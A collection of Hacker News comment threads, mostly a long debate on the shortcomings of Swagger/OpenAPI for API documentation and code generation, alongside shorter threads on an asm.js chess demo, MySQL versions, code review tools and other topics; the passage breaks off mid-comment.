$('#chess__board-message').click(function() { var m = new ChessDemo.Match(); m.$boardOverlay.hide(); m.startNextTurn(); });
------
billforsternz
Interesting. I slowed a game down to 1000ms per move so I could realistically
follow what was going on. The game started 1.Nf3 Nf6 2.e4?
So White sacrifices (loses?) a pawn for no compensation on move 2. Not really
sure what this says in respect of the experiment in general, but it does smell
a little.
Also; Showing the dark squares would be a massive usability advance! And it
would be nice if they respected some simple and fundamental chess conventions
(for example presenting the moves in the way I did in my comment above - move
numbers increment after whole moves not half moves)
~~~
chaddeshon
It's almost certainly playing out of an opening book.
There is a move history, but you have to expand it.
~~~
asdfologist
How does playing out of an opening book explain the opening blunder 2. e4?
~~~
danielbarla
Well, I guess if it really was out of a book, it would imply that the quality
of the engine itself wasn't at fault, but rather a bad opening book. Also,
without that line being thoroughly researched, it'd be difficult to say
whether it's a blunder, or a clever sacrifice. Again, it could be an
incomplete opening book which led the engine to offer the sacrifice, but then
didn't have info on how to capitalise on it.
Though in this case, I think it's almost certainly a blunder, that line does
not appear to be a well known opening.
~~~
V-2
There are opening books, and there are opening books. 1. Nf3 Nf6 2. e4 can no
doubt be found in some opening books due to the sheer fact that someone,
somewhere, played it, and it got archived. Then yes it's a line that could get
selected at random.
It's not a serious opening though, it looks frivolous - could be played in
simultaneous games, or in bullet chess for its surprise value etc.
If you optimize the opening book to include serious games only, you're
unlikely to come across this line.
[http://www.chessgames.com/perl/explorer?node=98&move=2&moves...](http://www.chessgames.com/perl/explorer?node=98&move=2&moves=Nf3.Nf6&nodes=74.98)
Given the insame amount of opening theory research humanity has done by now,
if e4 on the third move here was even remotely close to a clever sacrifice,
chess community would have noted it by now.
------
bratsche
I set it to as slow as it could go so I could watch the game. It was weird
because it got to a point where it declared a draw, but the pieces were still
moving around so I left it alone. Eventually a couple more pieces were
captured and the non-optimized side managed to win, so it updated from "draw"
to "checkmate".
------
TazeTSchnitzel
Interestingly, asm.js has an advantage in Firefox and Chrome for me, but not
in Safari.
~~~
cjbprime
Safari doesn't implement an asm.js backend, presumably?
~~~
TazeTSchnitzel
Nor does Chrome, but I think Chrome takes the `"use asm";` as a hint to use
certain optimisations.
~~~
brendandahl
Chrome should enable turbo fan with the "use asm"; set. Though the only
confirmation of this is saying it's tested in beta.
[https://code.google.com/p/v8/issues/detail?id=2599#c77](https://code.google.com/p/v8/issues/detail?id=2599#c77)
~~~
azakai
It's in release Chrome currently.
------
mzaccari
Link to source:
[https://github.com/MicrosoftEdge/Demos/tree/master/chess](https://github.com/MicrosoftEdge/Demos/tree/master/chess)
------
pacomerh
So does this mean that asm.js is good for longer operations? Because I tried
reducing the think time and the engine lost.
~~~
akovaski
I think it rather means that the search time was short enough that neither
search tree got deep enough to form advantageous moves. (When I check the
detailed output, it seems that the asm.js version visits at least 2x as many
nodes as the un-optimized version, independent of Time-per-turn)
------
rusbus
An interesting tidbit (chrome):
When you push it up to 1000ms per move, since the difference between 15 moves
ahead and 16 moves ahead is so large, both engines end up making 15 moves
ahead and win / lose about half the time, even though asm.js is visiting more
nodes.
~~~
dclowd9901
I noticed the same behavior by hobbling their time down to 10ms for each.
------
groupmonoid
At high level chess (which this is), white has a significant advantage over
black. Always picking asm.js as white (and not providing a setting to change
it) is a bit disingenuous.
~~~
vincentkriek
I don't know if it's updated but here asm.js is the black (or blue) player.
------
stuaxo
Ran it in chrome and it came out to a draw.
~~~
iopq
Of course, even a chess engine that is stronger will sometimes draw or lose to
a weaker one.
------
stop1234
"Checkmate! The non-optimized JavaScript wins!"
That's funny.
| {
"pile_set_name": "HackerNews"
} |
Why Are Our Most Important Teachers Paid the Least? - artsandsci
https://www.nytimes.com/2018/01/09/magazine/why-are-our-most-important-teachers-paid-the-least.html
======
jhokanson
Does anyone know what the tuition is for the Abbott preschool program that is
mentioned in the article? My impression has always been that one of the
reasons that teachers get paid so little is that class sizes are relatively
small (e.g. 4 infants per teacher in NC). I personally think preschool
teachers are not paid enough but I'm curious how Abbott is able to pay their
teachers so much.
| {
"pile_set_name": "HackerNews"
} |
Inferring the mammal tree (2019) - dadt
http://vertlife.org/data/mammals/
======
JoeAltmaier
Very educational!
My takeaway: while primates have done very well (lots of branching; lots of
species), Wow Rats! Such detailed diversity!
------
adamc
Fascinating, but a little hard to use.
| {
"pile_set_name": "HackerNews"
} |
Which MySQL Version to Use, and Why? - napolux
http://deafbysalami.blogspot.it/2013/08/which-mysql-version-to-use-and-why.html
======
bsg75
Thankfully there are RDBMS engines where you can upgrade to a recent version
(not necessarily bleeding edge and after appropriate testing), gain feature
and performance improvements, without the apparent fear of the unknown the
author has. Stability and age are not always tied to each other in software.
If the mindset in this article is any example of how DBAs responsible for
MySQL must think to survive, then it is no surprise why so many other bad
choices in data storage are made in an attempt to avoid SQL/RDBMS - when what
needs to be avoided is MySQL.
| {
"pile_set_name": "HackerNews"
} |
What I want in a code review tool - zekenie
GitHub PRs can sometimes be a clumsy tool for code review. What I want in CR software that I can't find:<p>- file by file approval (reviewer approves once, its out of the diff)
- filter files by glob string (I want to look at all the models right now)
- state management of requests (you've completed 2 reviewer requests, responded to 4, etc)
======
piotrkaminski
Reviewable does 2 out of these 3 IIUC (no globs yet) and integrates with
GitHub PRs. Might want to take a look. (Disclaimer: I built it.)
| {
"pile_set_name": "HackerNews"
} |
Ask HN: Getting started with Programming for Cloud Storage - sthustfo
As you all know, "cloud storage and management" of data is now one of the basic necessities for any application these days. Be it the media streaming, critical business data or the medical records of patients - basically enabling portable data. However I have no knowledge at all about the programming aspect of the cloud storage. Hence I need advice and suggestions on how to go about learning about the basics as well as programming aspect of cloud storage.<p>I have close to 10 years programming experience mostly in telecom and networking in general and protocols, mobile and VoIP to be specific. I am very proficient in C, a bit of C++ and perl. I have learnt ruby and tried my hand with RoR.
======
hrasm
\- Sign up for Amazon Cloud Services. It is free for a year. (this might have
changed...check at the Amazon website)
\- Go through their tutorials and/or peruse the forums for Ruby code snippets.
\- Start slow by getting rudimentary code working in your environment and
accelerate from there.
------
gspyrou
You may check this presentation from PDC10 for Windows Azure Storage
<http://channel9.msdn.com/Events/PDC/PDC10/CS11>
| {
"pile_set_name": "HackerNews"
} |
Why do corporations speak the way they do? - danielnixon
https://www.thecut.com/2020/02/spread-of-corporate-speak.html
======
robocat
Dupe? from [https://www.vulture.com/2020/02/spread-of-corporate-
speak.ht...](https://www.vulture.com/2020/02/spread-of-corporate-speak.html)
| {
"pile_set_name": "HackerNews"
} |
Problems with Swagger - senand
http://blog.novatec-gmbh.de/the-problems-with-swagger/
======
gkoberger
My problem with Swagger is almost the opposite... it solves the problem (APIs
are very complicated to use!) by embracing this complexity with more
complexity and more tools. Rather, I believe the solution is a push to just
have simpler APIs.
It's crazy to me that it's harder to write a Swagger file than it is to write
the API itself. And there's a lot of tooling that benefits from Swagger,
but... I've found they all work 80%. Codegen, documentation, etc get 80% of
the way there.
(Also, OAS 3 has linking, which is very similar to your hypermedia complaint)
~~~
mcescalante
I had these same issues. It took me considerably more time and effort to write
a Swagger spec and get the UI to actually behave than it did to write my
entire API and some simple docs in markdown.
I also tried out the "codegen" and a few other projects that generate
boilerplate from a spec (for Python) - the code it generated was frustrating,
lengthy, and much more complex than the simple endpoints that I quickly wrote
from scratch.
~~~
eropple
_> It took me considerably more time and effort to write a Swagger spec and
get the UI to actually behave than it did to write my entire API and some
simple docs in markdown._
How long did it take to write API consumer libraries in twenty languages and
update every one on API change?
If you don't care about that, then Swagger isn't a good idea for you. But I'd
think really hard about whether you _should_ care about it if you think you
don't.
_> the code it generated was frustrating, lengthy, and much more complex than
the simple endpoints that I quickly wrote from scratch_
Sure--but you didn't have to write it.
~~~
pbreit
Is whatever value people are getting out of client libraries provided by
something generic like [http://unirest.io](http://unirest.io) ?
When does it make sense to issue API-specific client libraries for a plain ole
RESTful API?
~~~
eropple
_> When does it make sense to issue API-specific client libraries for a plain
ole RESTful API?_
Any time you have a statically-typed language consuming you. Having to write
my own Jackson declarations to pull in your API to a JVM project or my own
DataContract barf for a CLR one is a quick way to make me hate you, and me
hating you means I'm already looking for an alternative that isn't you that
gets out of my way.
~~~
pbreit
I sort of thought the opposite, that the client libraries are what is getting
in the way.
~~~
eropple
So you enjoy writing a bunch of boilerplate class files that are manual
translations of somebody else's doc?
~~~
pbreit
No, I just like to get started coding API calls.
------
mr_tristan
I've found swagger codegen to be really, really inconsistent between different
implementations. A few of them - I recall we had a team using Qt - didn't even
generate compilable code. When I looked into the infrastructure of the codegen
project, I found... mustache.
Check it out yourself: [https://github.com/swagger-api/swagger-
codegen/tree/master/m...](https://github.com/swagger-api/swagger-
codegen/tree/master/modules/swagger-codegen/src/main/resources)
Mustache is fine for doing a little view rendering, but for language
generation... it's really obnoxious to use. Say you want to customize the
output. Well, now you're basically replacing one of those magic .mustache
files. And what's the model you use to generate those mustache files? Well,
you got to look through the codebase for that.
I ended up just not using swagger-codegen, and created my own StringTemplate
based system, which got the job done a lot faster. The swagger core model was
really janky to build logic around, however, so this system was really
implementation specific.
In the end, were I to do it all over again, I would have probably just built a
different mechanism. And honestly, building your own damn little DSL and code
generators for your use case will probably be faster then integrating Swagger.
_Especially_ if you do not use the JVM as part of your existing toolchain.
I've not found anything to support multiple languages easily. If I were to do
something today, I'd probably create a custom API DSL, custom code generators,
with an output for asciidoctor (which is awesome) and example and test
projects that test the generated code. Once you get the pipeline going the
work is pretty straightforward.
~~~
wing328hk
> I've found swagger codegen to be really, really inconsistent between
> different implementations. A few of them - I recall we had a team using Qt -
> didn't even generate compilable code. When I looked into the infrastructure
> of the codegen project, I found... mustache.
Yup, some generators (e.g. ActionScript, Qt5 C++) are less mature than the
others (e.g. Ruby, PHP, C#). For the issues with Qt5 C++ generator, please
open an issue via [http://github.com/swagger-api/swagger-
codegen/issues/new](http://github.com/swagger-api/swagger-codegen/issues/new)
so that the community can help work on it.
> Mustache is fine for doing a little view rendering, but for language
> generation... it's really obnoxious to use. Say you want to customize the
> output. Well, now you're basically replacing one of those magic .mustache
> files. And what's the model you use to generate those mustache files? Well,
> you got to look through the codebase for that.
Instead looking through the codebase, you may also want to try the debug flag
(e.g. debugOperations, debugModels) to get a list of tags available in the
mustache templates: [https://github.com/swagger-api/swagger-
codegen/wiki/FAQ#how-...](https://github.com/swagger-api/swagger-
codegen/wiki/FAQ#how-to-debug-swagger-codegen)
I agree that mustache may not be the best template system in the world but
it's easy to learn and developers seem pretty comfortable using it.
> Especially if you do not use the JVM as part of your existing toolchain.
One can also use docker ([https://github.com/swagger-api/swagger-
codegen#docker](https://github.com/swagger-api/swagger-codegen#docker)) or
[https://generator.swagger.io](https://generator.swagger.io)
([https://github.com/swagger-api/swagger-codegen#online-
genera...](https://github.com/swagger-api/swagger-codegen#online-generators))
to leverage Swagger Codegen without installing JVM.
Thanks for the feedback and I hope the above helps.
(Disclosure: I'm a top contributor to the project)
~~~
gregopet
Mustache is the most limiting (not to mention ugly) template language I've
seen in a long time. It allows no logic whatsoever and even writing simple if
statements is tedious. We have a Swagger spec from which we generate
Asciidoctor documentation via a Gradle plugin which works very nice, and
generate basic POJOs for Java and POCOs for C#. That... does not work very
well for our purposes.
We wanted to produce named enumerables by using custom extensions and found no
way of doing it with Mustache. It didn't help that our custom extension YAML
was passed into Mustache as serialized JSON. One of our developers took it
upon himself to make it work and ended up writing his own simple version of
the Codegen which works well enough for us. He tried modifying one of the
backends preparing data for Mustache but then said rewriting it on his own was
just simpler.
------
hjacobs
While Swagger might not be perfect (some pain points are addressed with
OpenAPI v3) it works IMHO pretty well for us (Zalando) and myself doing API
first:
* use a decent editor to write the YAML e.g. [https://github.com/zalando/intellij-swagger](https://github.com/zalando/intellij-swagger) * do not write any boilerplate code and do not generate code (if that's possible in your env), e.g. by using [https://github.com/zalando/connexion](https://github.com/zalando/connexion) (Python API-first) * follow best practices and guidelines to have a consistent API experience, e.g. [https://zalando.github.io/restful-api-guidelines/](https://zalando.github.io/restful-api-guidelines/)
Most importantly Swagger/OpenAPI gives us a "simple" (everything is relative!)
language to define APIs and discuss/review them independent of languages as
teams use different ones across Zalando Tech.
~~~
cimi_
Easy is subjective, simple is objective. You probably meant easy ;)
------
Yhippa
I really like the idea of HATEOAS but I have never seen hypermedia controls
done in the wild across any companies I've worked for nor on any client
projects. I think it's very cool but a lot of development patterns don't
consider it.
~~~
richardwhiuk
I agree that HATEOAS is never deployed anywhere, but I think I'd go further
than that.
It's impossible for me to see how it would be possible to write a HATEOAS
client, and I can't in practice see anyone doing so.
Optimizing for HATEOAS seems to me to be optimizing for entirely the wrong
metrics, and a complete waste of development time and effort.
~~~
querulous
every web browser you use is a hateoas client
you get some html with embedded links and then the browser automatically goes
and fetches css, js, images...
the remaining links it just presents to you, the user, to follow or not as you
choose
hateoas is not a complicated idea. it's not meant to replace SOAP or gRPC or
thrift. it's something else
~~~
ajross
Except the browser really isn't. It has strict behavior, and the list of what
happens as it loads that hypermedia is deterministic and known to both the
client and server. The difference between what happens when the browser sees a
"stylesheet" link reference and a "icon" one is significant, and not something
the browser is expected to figure out on its own.
The HATEOAS idea is that you throw that out, just use some aribitrary XML
(sorry, "hypermedia") to return your application state, and that this somehow
magically empowers the client to be able to puzzle out all the things that can
be done to your state.
Except it can't. It's just arbitrary junk if you don't have a schema and a
spec. And it will always be so. Discoverability is (1) not something you can
get from a data structure and (2) something best provided by documentation,
not runtime behavior.
~~~
icebraining
I think you have a completely wrong idea about HATEOAS. The application is
certainly expected to be able to handle the data format, not figure out by
magic. As Fielding writes in his dissertation, _REST components communicate by
transferring a representation of a resource in a format matching one of an
evolving set of standard data types_. The client is certainly supposed to
understand these data types, that's why they must be standard (like HTML). The
dynamic part comes from the formats themselves, which may have variable or
optional elements depending on the state of the resource.
~~~
ajross
Someone needs to fix the wikipedia page on HATEOAS then, because it says
exactly the opposite of what you just did in its third sentence.
(One of the other problems with Fielding's work is precisely this word-salad
of new jargon and usages, leading to exactly this kind of what-does-it-REALLY-
mean-anyway confusion. But that's an argument for a different thread.)
~~~
icebraining
From the wikipedia page: _" The media types used for these representations,
and the link relations they may contain, are standardized."_
As for Fielding's work having a word-salad of new jargon and uses, I frankly
didn't get that by reading his dissertation, which I found quite clear. There
are a few concepts (Resources, Representations), but I think they make sense
in the context.
------
int_19h
TL;DR version:
The first problem is that Swagger encourages codegen, and in static languages,
said codegen is often unnecessarily restrictive when parsing input data.
Adding a new enum member, and what that does to an existing Java client (that
maps it to Java enum, which now has a missing member), is given as an example.
The second and third problems are actually one and the same, and that is that
Swagger doesn't do Hypermedia. If you don't know what that and HATEOAS is,
this entire part is irrelevant to you. If you do know, and you believe it's a
fad, then you wouldn't agree with any points in that complaint. If you do know
and like it, then you already know what it is about (it's basically just
rehashing the usual "why HATEOAS is the only proper way to do REST" narrative,
with Swagger as an example).
The last problem is that if you do API first (rather than YAML first), it's
overly verbose, and can potentially leak implementation details into your
spec.
~~~
jayd16
At its core, the complaint is just sour grapes from not planning ahead. You
wrote the API with the guarantee of an enum, and then broke the gurantee and
expected all the code relying on that guarantee to be fine. It doesn't work
that way.
~~~
int_19h
Not quite; the point it's trying to make is that having an enum is not
necessarily a guarantee that no new members will be added in the future, or at
least it shouldn't be.
I think it's half-right, in a sense that this is true for enums that are used
for input values only. If the API adds a new enum value, it can also add
handling for that value, so existing clients should just work (they just never
use that new value). But if the enum is present in any output data, then
adding a new value to it is a contract break, because existing clients can see
it, and they don't know what they're supposed to do with it.
------
misterbowfinger
This seems more like, "issues with how Swagger is used in Java". A lot of Java
developers are used to the SOAP APIs of yesteryear, and thus try to create
clients with Swagger when they should be using gRPC or Thrift.
In other language paradigms, I haven't faced this issue. Swagger is _just_
documentation, and a nice front-end on top. The Java annotations definitely
make it easy to generate, though, I'll give it that.
~~~
cookiecaper
Thrift and protobufs are underappreciated. Better integration in something
similar to the Swagger Editor would give these a much more comfortable home
and allow them to see adoption in the web world, where people generally expect
things to be a little softer.
I've never really liked the REST paradigm, so I'd be pleased to see it die.
My biggest complaint with Thrift: they still make you do some convoluted hacks
to get a two-way ("streaming") connection in the RPC, and when this is
discussed, they usually kibosh it pretty quickly by saying it's an unsupported
case and that you can find some hacks online, but they don't want to talk
about it any further.
This may not have been a big problem for them before gRPC was released for
protobufs, but it's definitely something that's worthy of attention and
response now. I know lots of people who are going with protobufs instead
because of this.
The other thing is that while Thrift boasts a lot of language compatibility,
several of these are buggy.
~~~
jessaustin
_I 've never really liked the REST paradigm, so I'd be pleased to see it die._
Don't hold your breath. Fielding's thesis is already 17 years old, so one
would expect its philosophy to endure by the Lindy Effect if for no other
reason.
~~~
cookiecaper
If the "Lindy Effect" was a natural law and not simply a shorthand to refer to
enduring popularity, nothing would ever die out; its lifetime would
continually double. Wikipedia notes this: _Because life expectancy is
probabilistically derived, a thing may become extinct before its "expected"
survival. In other words, one needs to gauge both the age and "health" of the
thing to determine continued survival._
There are lots of things in tech that we just stop doing one day. They get
replaced by a different hot new thing. I'm sure REST will not go extinct for a
very long time, but it definitely _could_ go cold, just like its popular
predecessors.
~~~
emmelaich
Perhaps REST as the thing you do over http with http verbs won't be around.
But the architectural principle called REST will be around forever because
it's essentially the same thing as functional programming.
That REST is cache friendly corresponds exactly to the way that pure functions
are memo-ising friendly.
------
dandlift
In my team we established a process where our first step is to write down the
spec of the API, in swagger format.
The spec is the source of thruth, and is written manually in yaml (that's not
that painful). The implementation comes later. Unit tests check that it
conforms with the spec. [1] We also have a fake API almost completely
autogenerated from the spec that's quite useful for preliminary testing of the
clients.
Client code generation wasn't up to my expectations, but I've experimented
with applying an handwritten template to a parsed spec and that seems viable.
Swagger as a format might have its quirks, but the tooling is there and having
it as the authoritive source of thruth paid off for Us.
[1] [https://bitbucket.org/atlassian/swagger-request-
validator](https://bitbucket.org/atlassian/swagger-request-validator)
------
badreaction
We use swagger heavily and I can say the following: 1) We use the tolerant
reader pattern. It is entirely possible to generate tolerant client code where
the enum and adding new element does not cause issues. The problem here is not
swagger but poor code gen.
2) We use hypermedia in all of our APIs extensively, I don't see how this is
impacted by swagger? Hypermedia is a runtime discovery mechanism and so other
than declaring the link structures in your schema, has no place in swagger. We
don't use HAL, and wouldn't recommend it either.
~~~
daenney
Totally agree on the codegen bits.
> To mitigate this problem just stop generating code and doing automatic
> deserialisation. Sadly, I have observed that’s a very hard habit to break.
That conclusion really irks me. In Java, if you're using AutoMatter for
example, you're one annotation away from discarding unknown fields and many
other serialisation frameworks offer the same ability. It's not a default
(which imho it should be) but it's trivial to fix.
------
throwaway2016a
I'm surprised RAML isn't suggested as na alternative.
[http://raml.org/](http://raml.org/)
~~~
misterbowfinger
Does it address the issues in the post?
~~~
jstoiko
The RAML 1.0 type system can help:
[http://adrobisch.github.io/blog/articles/hateoas-with-
raml-1...](http://adrobisch.github.io/blog/articles/hateoas-with-raml-10.html)
------
bluejekyll
> To mitigate this problem just stop generating code and doing automatic
> deserialisation.
No! WTF?! Just use generators that produce code that is resilient to a
changing API. Why would you get rid of a huge productivity boost because the
generator doesn't produce code you like? That's trading two hours of work to
change the generator, for many multiple hours of reproducing the proper API,
especially if you have many to support.
I stopped reading right there. My personal biggest issue with swagger is that
they threw the baby out with the bath water, reproducing XSD in Yaml, for no
good reason. The UI they produced was nice, and that is probably the best
feature of swagger. But the data format doesn't solve a new problem IMO, it
just created a new standard that we all have to deal with.
What is that now? Corba IDL, XSD, protobuf, thrift, avro, Swagger, Raml... I'm
sure because of the flaws in each of those, we really should just use the new
OpenAPI.
Or just get rid of them all and go bare metal with Cap'n Proto. Oh but don't
use code generators for any of those, because that would make it way too easy
to support all of them with a single API </sarcasm>.
------
prodikl
> The rest of the URIs are provided by Hypermedia.
I know this sounds awesome but in practice, it's really useful to have my
swagger UI exposing the endpoints for our front-end developers to consume.
What a pain it'd be for me to tell them "hit / and see what you get!"
Having HAL links between resources is great and this discovery aspect of
HATEOAS makes a lot of sense in development. But having a single entrypoint
"homepage" to the API, when it comes to swagger, doesn't make sense.
I ran into this when I asked another department for the endpoint to hit for
certain data. I was given a swagger page with a bunch of "/status" endpoints
that would then reveal additional endpoints. Who knows what rabbit hole I was
sent down. I just needed the endpoint and the necessary parameters.
If I were a third party or some outside developer consuming the API, it kind
of makes sense. But our internal swagger docs really should reveal endpoints.
I would feel like a big asshole if I asked my front-end co-worker to just "hit
/status" and see if you get what you need!
Disclosure: I don't use Swagger codegen. I only use the Docblock markup to
document my API and generate the swagger.json that I display on our docs page.
------
daliwali
An alternative is to just ditch these complicated documentation formats
altogether. Put down your pitchforks, I'll explain.
The author of REST, Roy Fielding stated that only the entry URL and media type
should be necessary to know in advance. Swagger would be considered out-of-
band information, if it's necessary to have this documentation beforehand then
it doesn't follow this constraint. Interactions must be driven by hypermedia,
an idea which has a very unmarketable acronym.
The alternative that is suggested is to _document media types, not APIs_. If
HTML were not a standard and every web page had to define its own technical
specifications, the web wouldn't have taken off, because it wouldn't have been
interoperable. Interoperability is key, it reduces friction from transitioning
between web pages on different servers. How HTTP APIs are built today is
wasteful, there are vendor-specific tooling costs up front and it doesn't
scale.
~~~
jshen
What is an example of a well done API that functions the way you describe?
------
ogrim
I would never write Swagger by hand; why should I when I can have it
generated? We are using Swashbuckle[0] to generate Swagger for our ASP.NET Web
API, which have been a great experience. We can explore and test the API in
Swagger UI. I have been sprinkling a bit of hypermedia on top of this with
HAL, mainly just for having links. I have never met anyone wanting to go the
full HATEOAS route, but simple links can go a long wa. Swagger UI have been
great for this, as HAL alone isn't really expressive enough to document what a
link means. On the consumer side, I have been using NSwag[1] to generate
clients with good results.
[0]
[https://github.com/domaindrivendev/Swashbuckle](https://github.com/domaindrivendev/Swashbuckle)
[1] [https://github.com/NSwag/NSwag](https://github.com/NSwag/NSwag)
~~~
eddieroger
> why should I when I can have it generated?
Because maybe you work on a team where half are creating an API and half are
creating a client, and if you write a Swagger spec first, you can both be
working at the same time, against the same contract, and just meet in the
middle? And if you're working on the consumer side of things, you can take
that spec and stand it up against a mocking engine that will now give you
something to test against while your API team finishes their work? Just
because you would rather generate Swagger doesn't mean there's not a reason to
write it by hand before writing code.
~~~
ogrim
One can still do what you are describing and have the Swagger spec generated.
On my platform, I would just specify data types and the interfaces, and have
Swashbuckle parse this and spit out the Swagger spec. No need to hand-code
Swagger while creating the contract up front. After this step, one could work
at both sides of the contract independently as you describe.
------
Touche
So many problems in programming are caused by trying to replace code with
configuration. I've learned over time that the DRY principle can be harmful.
Avoiding repetition is only good when it remains equally readable and
powerful.
Defining a DSL is almost alway a better idea (but more difficult) than
defining a configuration format.
~~~
carapace
What is the difference between a DSL and a configuration format?
I mean the _essential_ difference. ;-)
------
beders
People often don't make a crucial distinction: Are you developing an API that
happens to be accessible via HTTP or are you developing a Web Service.
For an API where you control both the server and the client, you don't need to
use REST.
For a Web Service, where you don't control which clients are using, you are
better off with a RESTful implementation supporting hypermedia. Especially if
you are interested in keeping clients happy and not give them the middle-
finger shaped like a incompatible-v2 version of your service.
------
api
API Blueprint is much, much cleaner:
[https://apiblueprint.org](https://apiblueprint.org)
Here's a renderer:
[https://github.com/danielgtaylor/aglio](https://github.com/danielgtaylor/aglio)
It's less feature-rich than Swagger but the format is much less of a
nightmare.
------
banachtarski
I stopped reading after the author's silly interpretation of enums and why
they "weren't" useful. The rantings of a beginner don't make for a good
critique.
------
carapace
I read "YAML, which I call XML for lazy people"... and closed the tab.
~~~
borplk
why?
------
Vinnl
So here's something I've never quite understood when reading about HATEOAS:
> Without hypermedia, the clients would probably have to parse the payload to
> see if there are some kind of status and then evaluate that status to take a
> decision whether the order may or not be canceled.
In the given example, wouldn't the client still need to check whether there
actually is a `cancel` link (and know that it _can_ be there), and decide
whether or not to call it? In other words, isn't it unavoidable that there's
business logic in the clients?
------
buremba
"..swagger repeats itself a lot with redundant annotations, it also leads to
having more annotations than actual code."
(Shameless plug) For this exact problem, we developed a Java library that
makes easy to create RESTFul services that's highly integrated with Swagger.
Here it is: [https://github.com/buremba/netty-
rest](https://github.com/buremba/netty-rest)
We also tried hard to stick with Swagger-codegen but it's far from being
stable so eventually we ended up creating a Slate documentation that
demonstrates the usage of API with high level HTTP libraries for various
programming languages.
We convert Swagger spec to HAR representation, create the example usage of the
endpoint with httpsnippet from the HAR
([https://www.npmjs.com/package/httpsnippet](https://www.npmjs.com/package/httpsnippet))
and embed it in our Slate documentation using our Slate documentation
generator. ([https://github.com/buremba/swagger-
slate](https://github.com/buremba/swagger-slate))
Here is an example: [http://api.rakam.io/](http://api.rakam.io/)
------
hodgesrm
> The original problem swagger tries to solve is: API documentation. So, if
> you need to document an API, use a format that is created for that purpose.
> I highly recommend using Asciidoctor for writing documentation. There are
> some tools for Java that help you with this. However they are somehow
> technology specific. For instance Spring REST Docs works very well if you
> are using Spring / Spring Boot.
I have used Asciidoctor + Spring REST Doc to document a complex REST API and
my experience was almost complete the opposite for a number of reasons.
1.) Asciidoctor is powerful but exceedingly tedious to edit. It's especially
painful to use for documenting an API in advance--wikis like Confluence are
far easier to use and also allow commenting.
2.) Spring REST Doc generates snippets of asciidoc text that you must
laboriously incorporate into the parent asciidoc. It's particular painful when
combined with maven (another source of pain for some of us). Anybody who has
asked the question "where do I look in target to find my output?" as well as
"now that I found the output how do I make it go somewhere else instead?"
knows what I mean.
3.) The unit tests that Spring REST Doc depends on to generate output are hard
to maintain for anything beyond trivial cases. I've spent countless hours
debugging obscure bugs caused by Spring IoC problems. Also, the DSL format
used to define output of examples is hard to understand--just getting URLs to
show https schemes and paths takes time.
Finally, I would disagree that Swagger is purely designed to document existing
REST interfaces. We're using it to design the interfaces in advance. It's not
perfect but works better than other tools I have found let alone informal
specification via a wiki. Spring REST Doc is close to useless for design.
------
pibi
It looks like the perfect workaround is to use some middleware to autogenerate
the Swagger docs, at least to keep code and documentation in sync. After a
while I found myself doing the opposite, using Swagger to autoconfigure
endpoints ([https://github.com/krakenjs/swaggerize-
express](https://github.com/krakenjs/swaggerize-express)) and even mongodb
models ([https://github.com/pblabs/swaggering-
mongoose](https://github.com/pblabs/swaggering-mongoose)). Here is my actual
reference architecture: [https://github.com/pibi/swagger-rest-api-
server](https://github.com/pibi/swagger-rest-api-server)
Best thing about this approach is the clean separation between API definitions
and the implementation (all over the stack), so the teams can just discuss
about how to organize the resources and how to use them.
------
dqv
Here is a cached version as the site is currently giving me an HTTP 500:
[http://webcache.googleusercontent.com/search?q=cache:uQABqVC...](http://webcache.googleusercontent.com/search?q=cache:uQABqVCV2b0J:blog.novatec-
gmbh.de/the-problems-with-swagger/+&cd=1&hl=en&ct=clnk&gl=us)
------
maddening
To be honest I didn't knew that Swagger could generate API - still i wouldn't
use anything that generates code from some description (attempts I heard of
didn't worked out well in the past).
In projects I worked in Swagger was used to generate callable API from
existing implementation: add annotations (which are ugly :/, especially in
Scala, where such javaism hurts eyes even more), generate json, open it in
Swagger UI and let devs play with API.
What hurt me recently was 3.0 release - basePath got broken so, I got calls
generated with double slash (`host//api/call` etc.), and oauth2 is completely
broken and I cannot authenticate requests. 2.0 works with no issues, though I
find it sad that the vanilla version I downloaded uses hardcoded client_id and
client_secret.
------
Jdam
My problem with Swagger is the Swagger editor. It just works sometimes, but
sometimes everything is just red for no reason. Tried with Safari, ChrOme, Ff
on different Macs. Am I the only one who thinks this tool is unusable?
Edit: Cheers to you guys at Novatec, have to take a look on InspectIT again.
~~~
cookiecaper
It's definitely buggy. I've had more luck with it in Firefox than other
browsers. Refreshing and changing a line or two [usually] snaps it back into
shape.
Export your file frequently.
------
zip1234
I think Swagger is nice--codegen makes it simple to generate API clients for
various languages/frameworks. Saves a lot of time and potential sources of
errors. If there is something easier/better/more reliable, then I am all ears,
but Swagger keeps getting better.
------
tannhaeuser
Why are folks using Swagger or other tools for supposedly simple REST services
at all? It's not like Swagger is a "standard" or something, and from the
comments it appears using tooling for REST is a zero-sum game or even net
loss.
~~~
voycey
We started it using it for it's documentation and developer console generation
ability at first, I have to say that I am much happier when I get given a
swagger definition for an API, it lets me generate a client pretty much
instantly and as long as the definition is written well it more often than not
halves my integration time
~~~
tannhaeuser
I don't know if you're aware of the SOAP vs REST debate 10 years ago or Web
Services vs CORBA before that. Client generation, or any code generation at
all, was seen as a big no-no in the REST camp, so I find it ironic that today
this is used as Swagger et. al.'s saving grace. What I frequently see is that
inherently action-oriented protocols are crammed into resource-oriented REST
facades, only without any formal interface descriptions at all, and without
formal transactional or authorization semantics. OTOH, JSON REST services
can't be used without browser-side glue code at all so the Web mismatch
argument isn't working either. Makes you really wonder if there is any
rationality or progress in middleware usage at all.
------
glukki
Most of developers use Swagger wrong. But this is the right approach:
[https://github.com/swagger-api/swagger-node/](https://github.com/swagger-
api/swagger-node/)
Swagger is a contract. From contract you can generate documentation, client,
input/output data validation, mock responses, integration tests, and something
else, I'm sure.
If you start development from swagger — you can get everything in sync. That
way you can't forget to update documentation, validation rules, tests, or
whatever you generate from swagger. That way you can do work once! No work
multiplication!
It makes development So Much Easier!
------
epiecs
I also looked at swagger but found it needlessly complex for my needs. I opted
for blueprint api coupled with aglio to generate html docs and also provided a
nicely prepped postman collection including testing :)
------
tomelders
I think Koa (or Express) are the best tools for developing an API
spec/mock/doc that's useable and useful from the get go. You can have an
endpoint working in seconds, and it's easy to add all the different scenarios
you need. Dropping in middleware is easy too. And if you write your code well,
it's self documenting.
And ultimately, it's documentation for developers. I think it's as easy for a
non-js dev to parse and understand an endpoint controller than it is to parse
whatever freaky-deaky API documentation someone has cobbled together.
------
janslow
Whilst Swagger Codegen doesn't create perfect libraries and some of the
generators don't support all the features, once it's set up, it's just as easy
to create a client for every language as it is for just one.
For example, we create multiple client libraries, HTML documentation and a
partial server (so we don't have to manually write the parameter parsing and
models serializers).
Another advantage is you can start consuming the API as soon as the API design
